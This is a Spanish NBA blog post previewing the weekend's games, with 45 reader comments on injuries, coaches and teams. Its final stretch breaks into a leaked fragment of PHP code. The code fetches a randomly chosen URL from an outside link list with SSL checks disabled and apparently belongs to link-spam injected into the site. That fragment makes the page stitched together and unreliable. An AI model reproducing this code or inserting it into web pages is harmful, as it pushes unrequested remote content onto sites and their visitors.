Fin de semana: Tomad el mando

22 de November de 2013 por txusma

Un fin de semana más os dejamos al mando de la situación.

Esta misma noche tenemos un San Antonio – Memphis que promete. Los Grizzlies han ido mejorando con el paso de los partidos conforme han recuperado viejos automatismos e ideas. El partido frente los líderes de la liga se presenta muy abierto y no me extrañaría que los Spurs perdieran tras 8 victorias consecutivas. Otro partido interesante es el Chicago – Portland. Los Bulls vienen de una dolorosa y casi humillante derrota y seguro que querrán resarcirse ante una de las grandes sorpresas de la temporada. También habrá que echarle un ojo al Golden State – LA Lakers y al Brooklyn – Minnesota, no por que vayan a estar igualados (que a lo mejor sí) sinó porque se enfrentan 2 equipos atractivos  a 2 equipos que siempre merecen atención. Los Nets se encuentran, sin duda, entre la espada y la pared. No le deben quedar muchas balas a Jason Kidd en la recámara. Yo también guardaría un rinconcito de sueño para el Atlanta – Detroit, duelo de playoffs del Este auque los Pistons esten solo con el 36% de victorias, y el Phoenix – Charlotte, porque enfrenta a dos equipos que están muy por encima de lo que esperábamos de ellos a principio de temporada y podrían volver Bledsoe y Jefferson.  

El sábado no baja el ritmo. Tendremos 3 duelos de altura en el Oeste: El Dallas – Denver, el Portland – Golden State y el Minnesota – Houston. Dallas va rompiendo esquemas de la mano de un Monta Ellis desatado y los Nuggets ya sabemos lo fuertes que son en casa. Por su parte, los Blazers se enfrentan a otra buena piedra de toque. Como ganen sus dos partidos del fin de semana habrá que empezar a considerar muy candidatos a Playoffs. Rockets y Wolves se enfrentan en un duelo que ha de empezar a dejar las cosas claras: ¿Es Minnesota candidato claro a los Playoffs o no? Indiana y Miami tienen partidos fáciles en casa ante Philadelphia y Orlando, respectivamente y New York buscará romper su mala racha en la pista de los Wizards. No será fácil.

Para el domingo queda un Detroit – Brooklyn que nos podemos plantear ver en directo porqué será a las 20h00 hora española. Según como vayan los partidos del fin de semana, a lo mejor es el último encuentro de Kidd como entrenador. También temprano se juega un Chicago – LA Clippers, muy interesante. Chris Paul no es el mejor rival para que Derrick Rose recupere el nivel. Los Thunder reciben en casa a los Jazz y los Lakers a los Kings. Muy fácil para los primeros, algo menos para los segundos, sobretodo si a Cousins le da por estar centrado.

Comenta

45 comentarios a esta entrada

  1. Mamba_Blanca dice:
    #1

    Impresionante Drummond de momento en el Pistons-Atlanta, aqui hay perro grande para rato. Eso si, los Pistons tienen un grandisimo problema en la dirección y en el puesto de Alero.

    En la direccion, ya que Jennings centrado puede cumplir, pero no me parece que sea el base ideal para este equipo; además, Smith es lo contrario que necesitan ya que no tiene buena mano desde el triple y se le ve lento defendiendo a los 3 rivales.

      Citar

  2. rumbero dice:
    #2

    Jornada fea con las lesiones de Iggy, Marc y …Rose. De Gasol se dice que puede ser un esguince de rodilla aunque le harán hoy pruebas. Y en Chicago estaran aguantando la respiración hasta que se sepa el alcance de la lesión de Rose en la rodilla derecha, que es la “buena”. No pintaba bien, esperemos que no sea grave

      Citar

  3. Simon dice:
    #3

    Madremia los que han pegado un bajón impresionante de la temporada pasada a esta son Pierce y Garnett, vale que en su equipo no está saliendo nada, pero es que toman decisiones que no las tomaban ni con 18 años, no agarran balones incomprensibles, no eran rápidos pero lo suplian con otras virtudes… pero es que este año están tan lentos que ni con esas pueden… El equipo no juega a nada vale, pero es que individualmente creo que salvo López y Jhonson ( este muy ajustado ) el resto no están si quiera en el nivel físico minimo exigible para un titular en la NBA… Va a ser muy complicado que remonten el vuelo.

      Citar

  4. Denise dice:
    #4

    Simon:
    Madremia los que han pegado un bajón impresionante de la temporada pasada a esta son Pierce y Garnett, vale que en su equipo no está saliendo nada, pero es que toman decisiones que no las tomaban ni con 18 años, no agarran balones incomprensibles, no eran rápidos pero lo suplian con otras virtudes… pero es que este año están tan lentos que ni con esas pueden…El equipo no juega a nada vale, pero es que individualmente creo que salvo López y Jhonson ( este muy ajustado ) el resto no están si quiera en el nivel físico minimo exigible para un titular en la NBA… Va a ser muy complicado que remonten el vuelo.

    Pierce y Garnett estan acabados, Garnett ya lo estaba el año pasado.
    A mi lo unico que me gusta de los Nets son Lopez y el pedazo banquillo que tienen. Los otros 4 titulares me parecen una estafa, y no soy ventajista puesto que así lo expliqué en el analisis de los Nets previo a la competición.
    Y se intuia que Kidd era un fracaso como entrenador. Aun no entiendo como el ruso no lo despide y pone al mando de este proyecto a un entrenador serio, que ahora mismo es lo unico que puede enderezar el rumbo del equipo en la cancha.
    Es de locos poner de entrenador de un equipo con tanta presión, ego y con bastantes jugadores problematicos, a un tio con un historial repleto de delitos de violencia, alcohol y drogas. De baloncesto sabrá mucho Kidd no lo discuto, pero para ser un entrenador ganador, lo primero es ser una persona mas o menos ejemplar, seria y responsable que motive a sus jugadores y que le dedique muchas horas a estudiar sistemas y planteamientos propios y de los rivales, y no veo a Kidd quedandose en casa un sabado estudiando el juego de los Timberwolves.

      Citar

  5. Denise dice:
    #5

    Llamadme aguafiestas pero como está lesión de Rose sea mas o menos grave y lo aparte mas de 2 meses de las canchas, creo que podemos estar olvidandonos de aquel Rose MVP que hacia lo que le daba la gana a la defensa rival.
    Con 2 lesiones serias, uno ya no está preparado ni fisica ni mentalmente para estar liderando proyectos ganadores.
    Y el propietario de los Bulls habrá acabado el rollo de papel higienico esta noche pensando que a Rose aun le quedan por cobrar cerca de 80 millones de dolares!!!

      Citar

  6. Denise dice:
    #6

    Para mi las decepciones estan siendo los Pistons, Wizards y los Cavs. Esperaba mucho de estos conjuntos pero por ahora nada de nada.
    Los Pistons tienen un equipazo, con un Drummond que va a ser el mejor center en los proximos años (si es que no lo empieza a ser ya) y a tres tios con potencial All-Star (Jennings, Monroe, Smith) y no dan con la tecla ganadora.
    Lo de los Wizards lo mismo, equipo profundisimo y comiendose los mocos.
    Y los Cavs tienen mas excusas, Bennet y Bynum les han salido rana y desconozco que le pasa a Varejao pero sus numeros son una castaña en comparacion a los del año pasado. ¿Es el jugador mas desmejorado?

      Citar

  7. Denise dice:
    #7

    Viendo lo de Rose….me recuerda a lo tonto que ha sido Marcus Smart. Hace unos días anotó 39 puntos. De haberse presentado a este Draft hubiese sido elegido por Orlando, que practicamente hizo publico que le eligirían y se habría embolsado con seguridad sus 10 millones de dolares que le habrían asegurado la vida.
    El año que viene tendrá que competir en un Draft durisimo con los Parker, Wiggins y cia, y en cualquier momento puede lesionarse de gravedad y tener que dedicarse a vender perritos calientes en un puesto de comida rapida e resto de sus dias.

      Citar

  8. Ruxixón dice:
    #8

    Los Pistons empezaron más o menos bien,vislumbrándose cositas que parecían interesantes.Sin embargo con el paso de los partidos ha ido aumentado el pasotismo de los jugadores a la hora de defender,ahí es donde está el principal problema de los de la Motor City.Seguramente debe ser de los peores equipos en % oFG y creo que sus jugadores tienen condiciones físicas de sobra para,al menos,no ser tan madres en este apartado (quitando a Monroe que es un poco flojo).

    Washington es más de lo mismo aunque agravado por el hecho de que el punto final de la pasada temporada les dejó posicionados en un lugar más ilusionante.

    No sé,por jugadores no será (añado aquí a los Nets,que es el caso más llamativo,aunque me parece que le están haciendo la cama a Kidd,y no señalo a los Cavaliers,donde se debe señalar al GM),creo que en estas circunstancias es donde debe juzgarse el trabajo de un entrenador.

    Y estoy contigo Denise,que si Rose se ha lesionado gravemente de nuevo -ójala que no por favor- se acabó su carrera.

      Citar

  9. Viva_Dirk dice:
    #9

    Denise:
    Viendo lo de Rose….me recuerda a lo tonto que ha sido Marcus Smart. Hace unos días anotó 39 puntos. De haberse presentado a este Draft hubiese sido elegido por Orlando, que practicamente hizo publico que le eligirían y se habría embolsado con seguridad sus 10 millones de dolares que le habrían asegurado la vida.
    El año que viene tendrá que competir en un Draft durisimo con los Parker, Wiggins y cia, y en cualquier momento puede lesionarse de gravedad y tener que dedicarse a vender perritos calientes en un puesto de comida rapida e resto de sus dias.

    No puedo estar mas en desacuerdo. Smart cuando se presente el año que viene va a ser mucho mejor jugador y va a tener un futuro mucho mejor en la liga.

    Puede lesionarse, y morirse también.

      Citar

  10. Denise dice:
    #10

    Viva_Dirk: No puedo estar mas en desacuerdo. Smart cuando se presente el año que viene va a ser mucho mejor jugador y va a tener un futuro mucho mejor en la liga.

    Puede lesionarse, y morirse también.

    Pero si se hubiese presentado este año, hubiese sido nº2 seguro, y hubiese progresado mas este año en los Magic jugando una minutada entre los mas grandes que jugando en la NCAA.
    Digo yo que se progresará mas rapido jugando contra Rondo un viernes y el sabado contra Paul, que jugando contra unos muchachitos de tu edad de los cuales, el 80% ni pisará la NBA

      Citar

  11. Viva_Dirk dice:
    #11

    Una minutada? Oladipo esta jugando 26 minutos. Y en la NCAA progresará mucho mas como jugador, tiene todo el tiempo que quiera para entrenar técnica individual y táctica, además de un juego mas colectivo. Algo que en una temporada NBA es imposible.

    Los jugadores que estan 2 o mas años en la universidad sufren mucho menos en su primer año profesional, de hecho los hay que dan el salto el primer año por puro talento y nunca se recuperan del golpe.

      Citar

  12. Esteban dice:
    #12

    Denise:
    Para mi las decepciones estan siendo los Pistons, Wizards y los Cavs. Esperaba mucho de estos conjuntos pero por ahora nada de nada.
    Los Pistons tienen un equipazo, con un Drummond que va a serel mejor center en los proximos años (si es que no lo empieza a ser ya)y a tres tios con potencial All-Star (Jennings, Monroe, Smith) y no dan con la tecla ganadora.

    ayer ya salio de titular Singler por Smith

    no es que a mi smith no em guste, incluso es un tio muy muy valido para ayudar en un buen equipo, pero creo que no tiene nada que hacer en estos Pistons hoy

    traspasar a Smith a los Rockets, le significaria a los pistons sacarse presion de entrar a PO y seguir apostando a largo plazo y sobretodo a Singler que tiene pasta de alero titular/jugador de equipo, excelente

    hoy smith lo unico que hace en detroit es generar expectativas cuando este equipo deberia estar pensando en lso proximos 5 años y no en el hoy

    le alcanza el espacio a los Rockets para un trade por una excepcion de traspaso por smith?

      Citar

  13. Heineken dice:
    #13

    En un equipo con el teórico mejor juego interior de la liga no puedes tener de base a Brandon “Agujero Negro” Jennings.

      Citar

  14. Denise dice:
    #14

    Viva_Dirk:
    Una minutada? Oladipo esta jugando 26 minutos. Y en la NCAA progresará mucho mas como jugador, tiene todo el tiempo que quiera para entrenar técnica individual y táctica, además de un juego mas colectivo. Algo que en una temporada NBA es imposible.

    Los jugadores que estan 2 o mas años en la universidad sufren mucho menos en su primer año profesional, de hecho los hay que dan el salto el primer año por puro talento y nunca se recuperan del golpe.

    26 minutos con 3 partidos a la semana para un total de 82 partidos es una minutada.
    En Europa los grandes jugadores apenas sobrepasan esos minutos y gracias.

      Citar

  15. Esteban dice:
    #15

    alguien vio jugar a burke anoche?

      Citar

  16. Esteban dice:
    #16

    con lo de anoche, ya podemos decir que los Blazers van enserio no?

      Citar

  17. Esteban dice:
    #17

    comienza a ver llenos el estadio de los Pelicans que llegan al 50%, con el regreso de Anderson la cosa mejora muchisimo y de a poco Evans va engranando; nos falta ver la mejor version de Gordon y Holiday, ambos de arranque medio lentos, pero hay talento aqui

      Citar

  18. Esteban dice:
    #18

    Denise: Pero si se hubiese presentado este año, hubiese sido nº2 seguro, y hubiese progresado mas este año en los Magic jugando una minutada entre los mas grandes que jugando en la NCAA.
    Digo yo que se progresará mas rapido jugando contra Rondo un viernes y el sabado contra Paul, que jugando contra unos muchachitos de tu edad de los cuales, el 80% ni pisará la NBA

    lo de jugar contra muchachitos no es lo que lo hara progresar, sino el tiempo que puede dedicarle al entrenamiento y a mejorar sus fundamentos, cosa que es imposible en la nba jugando cada dos días y viajando constantemente

      Citar

  19. Esteban dice:
    #19

    ahora, los BULLS deben querer cortarse las venas, el convenio colectivo pasado les dio la chance de ofrecerle el aumento a derrick Rose mayor, que incluso se llama la clausula ROSE, desde que le firmaron esa millonada, jugo lesionado y pocos partidos la temporada siguiente al lockuot, no jugo ni un juego el año pasado, y aparentemente se perdera todo este año

    dios quiera que no, pero con tantas lesiones y operaciones, su contrato se volvera un lastre para los Bulls

      Citar

  20. Denise dice:
    #20

    Esteban: lo de jugar contra muchachitos no es lo que lo hara progresar, sino el tiempo que puede dedicarle al entrenamiento y a mejorar sus fundamentos, cosa que es imposible en la nba jugando cada dos días y viajando constantemente

    Que se queden entonces 4 años en la Universidad y que empiecen en la NBA una vez graduados…
    Dios, durante finales de los 90 y principios del 00′ han salido un puñado de jugadores directamente desde el instituto a la NBA sin que se resientan sus fundamentos y ahora os poneis tikismikis porque un tio sobradamente preparado para jugar en la NBA se ha echado para atras y decide estar un año mas dejando la posibilidad de tener su vida resuelta en el destino.

    Ya lo dice el refran, mas vale pajaro en mano que cientos volando, y Smart esta jugando peligrosamente con su situación economica.

      Citar

  21. The wolf dice:
    #21

    A falta de resonancia magnetica se dice que Rose tiene una rotura del ligamento anterior de la rodilla ahora menos buena.

    Hay un estudio que prueba que si un deportista se rompe el ligamento anterior de una rodilla, en un 80% de los casos se suele recaer con la misma lesion en la misma rodilla o en la otra.

      Citar

  22. The wolf dice:
    #22

    Y Marc parece casi oficial que son 6 semanas de baja

      Citar

  23. Mamba_blanca dice:
    #23

    Lo de Marc son minimo 6 semanas, Pondexter estuvo con la misma lesion 8 semanas, y en el peor de los casos se habla de unas 10 semanas de lesion. Por lo que parece se puede ir olvidando del All-Star este año…

      Citar

  24. Ruxixón dice:
    #24

    Rose,desgarro de menisco en la rodilla derecha.Necesita pasar por el quirófano y tras la operación se establecerán los plazos de recuperacion

    En algunos casos ha habido recuperaciones exprés de 1 mes-2 meses pero en otros casos se dan plazos de 6 meses.

      Citar

  25. Heineken dice:
    #25

    CP3 no logró otro doble-doble, pero si le acaba de dar la victoria a Clippers frente a unos correosos Kings.

      Citar

  26. Vader dice:
    #26

    Cada vez me gusta más Carter-Williams, lo estoy viendo contra Indiana y tiene un potencial increíble. En defensa es un pulpo con esos brazos largos que tiene y anota y asiste con gran facilidad. Un jugón en toda regla.

    Saludos

      Citar

  27. Jose Luis dice:
    #27

    Heineken:
    CP3 no logró otro doble-doble, pero si le acaba de dar la victoria a Clippers frente a unos correosos Kings.

    Bueno, eso de que ha dado la victoria… ha fallado dos tiros libres en el ultimo minuto que telita. Los Clippers sufriendo muchísimo ante unos Kings que ni siquiera han querido ganar. Ni hack a Jordan ni una jugada en condiciones al final, un completo tanking vaya.

    Cousins fallando dos tiros libres a falta de 1 minutito…

    Vader:
    Cada vez me gusta más Carter-Williams, lo estoy viendo contra Indiana y tiene un potencial increíble. En defensa es un pulpo con esos brazos largos que tiene y anota y asiste con gran facilidad. Un jugón en toda regla.

    Saludos

    +1 a lo de Carter Williams, parece que será titular casi toda su carrera, y no me extrañaría verle en algún all-star.

      Citar

  28. rumbero dice:
    #28

    Que desastre los Knicks. Ahí no defiende ni el tato y el figura de JR debe tener algun trapicheo con Woodson para que le deje tirarse las que quiera. Decían que la última vez que tiró por encima del 50% fue el 3 de Abril de este año. Y bien los Wizards que empiezan a entonarse con un gran Wall.
    Luego te pones 3 minutos del Spurs – Cavs y dices, pero estos tios juegan a lo mismo? En ataque es algo sangrante

      Citar

  29. Denise dice:
    #29

    Hagan sus apuestas, quien será el primero en caer ¿Kidd, Woodson ó Mike Brown?
    Al de los Cavs directamente habría que quitarle la licencia de entrenador.

    Grande Glen Davis jugando por primera vez tras 10 meses y cuajando un enorme partido ante los Heat.

      Citar

  30. Denise dice:
    #30

    En el segundo 20 del siguiente video podeis ver como el payaso de Cousins impide a Isiah Thomas que le de la mano a Chris Paul tras finalizar el partido

      Citar

  31. Heineken dice:
    #31

    Jose Luis: Bueno, eso de que ha dado la victoria… ha fallado dos tiros libres en el ultimo minuto que telita. Los Clippers sufriendo muchísimo ante unos Kings que ni siquiera han querido ganar. Ni hack a Jordan ni una jugada en condiciones al final, un completo tanking vaya.

    Cousins fallando dos tiros libres a falta de 1 minutito…

    Las ultimas canastas de Clippers han sido triple de Paul, 2+1 de Paul donde falla el tiro libre, asistencia de Paul a Griffin para mate y dos tiros libres para Paul, donde mete 1, el que les da la victoria, si eso no es dar la victoria…

      Citar

  32. Jose Luis dice:
    #32

    Heineken: Las ultimas canastas de Clippers han sido triple de Paul, 2+1 de Paul donde falla el tiro libre, asistencia de Paul a Griffin para mate y dos tiros libres para Paul, donde mete 1, el que les da la victoria, si eso no es dar la victoria…

    Si los Kings llegan a querer ganar, no pasa eso.

    Aparte, si por un casual hubieran metido la última jugada, ¿no se diría que Paul ha perdido el partido, fallando dos tiros libre clave?

      Citar

  33. Simon dice:
    #33

    Denise:
    En el segundo 20 del siguiente video podeis ver como el payaso de Cousins impide a Isiah Thomas que le de la mano a Chris Paul tras finalizar el partido

    Bastante bien aguantó el tirón el muchacho… yo no sé si estaría aguantado tantas provocaciones y persecución por parte de los arbitros. Este año ya son varios los partidos que he visto y en todos igual… los arbitros le han piyado la matricula de años anteriores y lo utilizan de saco de boxeo… y este año está bastante callado a pesar de que tanto rivales como arbitros buscan provocarlo a menudo… Me dan mucho asco los arbitros en la NBA… la mayoría quieren ser más protagonistas que los mismos jugadores.

      Citar

  34. Heineken dice:
    #34

    Jose Luis: Si los Kings llegan a querer ganar, no pasa eso.

    Aparte, si por un casual hubieran metido la última jugada, ¿no se diría que Paul ha perdido el partido, fallando dos tiros libre clave?

    En el mundo de las suposiciones yo podría ser mejor jugador que Michael Jordan.

      Citar

  35. Jose Luis dice:
    #35

    Heineken: En el mundo de las suposiciones yo podría ser mejor jugador que Michael Jordan.

    ¿Se diría o no se diría?

    Igual que se dice que Miami perdió el partido con Boston por el tiro libre de Wade, aquí se diría igual.

      Citar

  36. Heineken dice:
    #36

    Clippers gana de 1 punto, punto que mete Paul. Fin del asunto.

      Citar

  37. Jose Luis dice:
    #37

    Heineken:
    Clippers gana de 1 punto, punto que mete Paul. Fin del asunto.

    Que sí, que vale… que si no podemos hablar de suposiciones, no se puede tener un blog ni hacer comentarios.

      Citar

  38. Blade Petrovic dice:
    #38

    Blake Griffin tirando y acertando desde media distancia, para que luego digais. Nets un desastre, el partido se resume en una inefectividad total del frontcourt en el tercer cuart (creo que 0 puntos entre todos)

      Citar

  39. Blade Petrovic dice:
    #39

    Hasta ahora Pierce tiene un pauperrimo 3/11. Nada que añadir

      Citar

  40. Blade Petrovic dice:
    #40

    Final 106-94. Partidazo de Stuckey al cual le entraba todo, Monroe también bastante bien con un 18-11. En los Nets no se salva nadie excepto JoJo, además no juegan a nada. Su única estrategia para remontar darle el balón a Joe Johnson y que este invente. Me parece que Kidd no se come el turrón, mi pregunta ¿Podrían fichar a Hollins?

      Citar

  41. Heineken dice:
    #41

    Jose Luis: Que sí, que vale… que si no podemos hablar de suposiciones, no se puede tener un blog ni hacer comentarios.

    Es que me parece un poco tontería ponerse a decir que si no lo hubiese metido habrían perdido, etc, etc, pues claro, pero el caso es que metió el que tenía que meter y ganaron gracias a él. xD

    Ahora el colega lleva ya 16 puntos y 17 asistencias en 27 minutos. Paliza que se están llevando los Bulls

      Citar

  42. Mamba_blanca dice:
    #42

    Impresionante el repaso de Clippers a los Bulls aprovechando las bajas de Rose y Butler y un dia dulce en el tiro, creo que han acabado sobre el 60% en TC

      Citar

  43. Mamba_Blanca dice:
    #43

    Menudo cambio ha dado Portland desde hace un par de temporadas, cualquiera lo diria cuando se lesionaron Roy y Oden.

    Lo de Klay Thompson es impresionante, un hombre con una metralleta tiene menos peligro.

      Citar

  44. HisRoyalAirness dice:
    #44

    Por cierto, lo de la lesiòn de Rose es “buena” noticia, dentro de lo que cabe. Un menisco roto no es nada comparado con un LCA. El único problema que le veo es mental a medio plazo

      Citar

  45. Mamba_Blanca dice:
    #45

    Se que es imposible por renombre y por sueldo, pero lo mejor para los Lakers seria que Nash saliese como sexto hombre.

    Llevamos tres victorias seguidas y ahora nos tocan Wizards, Pistons y Brooklin; a ver si para cuando vuelva Kobe seguimos minimo al 50% de victorias

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>